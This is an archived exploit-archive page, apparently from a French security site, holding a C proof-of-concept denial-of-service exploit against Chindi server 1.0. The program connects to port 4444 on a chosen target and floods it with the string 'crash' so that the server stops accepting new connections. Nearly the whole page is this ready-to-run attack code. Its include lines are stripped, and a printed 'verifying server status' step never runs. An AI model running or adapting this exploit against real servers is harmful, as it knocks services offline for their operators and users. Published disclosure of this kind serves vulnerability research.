Chindi server 1.0  Denial of Service Exploit (chindi-dos-poc.c)

    
 
     * Version TXT Disponible ici *
                              
/***************************************************
                              * Chindi server 1.0  Denial of Service
                              * Proof of Concept by Luca Ercoli  luca.ercoli at inwind.it
                              * After DoS, server appears to be up, but will not allow
                              * new connections.                                           
                              ****************************************************

                              #include 
                              #include 
                              #include 
                              #include 
                              #include 

                              #define PORT    4444
                              #define DOS     "crash"


                              int main(int argc, char *argv[]){

                              int nOpt,count,sockfd;
                              struct hostent *he;
                              struct sockaddr_in server_addr;

                              char *host;

                              printf ("\nChindi server 1.0 remote DoS\n\n");

                              if(argc < 2 ) {
                              printf ("Usage: %s -t target\n",argv[0]);
                              exit(0);
                              }

                              while((nOpt = getopt(argc, argv, "t")) != -1) {

                              switch(nOpt) {
                              case 't':
                              host = optarg;
                              break;
                              default:exit(0);
                              }
                              }

                              if ((he = gethostbyname(argv[2])) == NULL)
                              {
                              herror("gethostbyname");
                              exit(1);
                              }

                              server_addr.sin_family = AF_INET;
                              server_addr.sin_port = htons(PORT);
                              server_addr.sin_addr = *((struct in_addr *) he->h_addr);

                              sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

                              if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct 
                              sockaddr)) == -1)
                              {
                              perror("Connect");
                              exit(1);
                              }

                              printf("1. Connected\n");
                              sleep(1);
                              printf("2. Sending crash string\n");
                              sleep(1);
                              printf("3. Verifing server status: ");
                              sleep(1);

                              for (count=0; count<9999; count++) send(sockfd,DOS,strlen(DOS),0);

                              close(sockfd);

   

   

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits